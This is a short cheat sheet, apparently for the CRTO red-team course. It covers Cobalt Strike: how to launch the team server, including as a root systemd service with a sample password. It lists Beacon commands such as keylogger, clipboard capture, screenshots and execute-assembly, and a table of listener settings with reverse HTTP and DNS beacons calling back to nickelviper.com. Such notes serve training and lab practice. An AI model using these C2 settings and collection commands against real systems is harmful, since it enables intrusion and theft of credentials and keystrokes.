Awesome Hackpuntes
CRTO Cheat Sheet

Cobalt Strike

Team Server

From terminal

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX

As a Service

sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

sudo systemctl daemon-reload
sudo systemctl status teamserver.service
sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service
sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service

Beacon

# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jid>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Get metadata/info Beacon

Listeners

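| name      | payload                            | host                 | port                                                                     | bindto    | beacons              | profile |
|-----------|------------------------------------|----------------------|--------------------------------------------------------------------------|-----------|----------------------|---------|
| dns       | windows/beacon_dns/reverse_dns_txt | pics.nickelviper.com | 53                                                                       |           | pics.nickelviper.com | default |
| http      | windows/beacon_http/reverse_http   | nickelviper.com      | 80                                                                       |           | nickelviper.com      | default |
| smb       | windows/beacon_bind_pipe           |                      | TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (change the last 4)         |           |                      |         |
| tcp       | windows/beacon_bind_tcp            |                      | 4444                                                                     | 0.0.0.0   |                      |         |
| tcp-local | windows/beacon_bind_tcp            |                      | 4444                                                                     | 127.0.0.1 |                      |         |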


Last updated 1 year ago
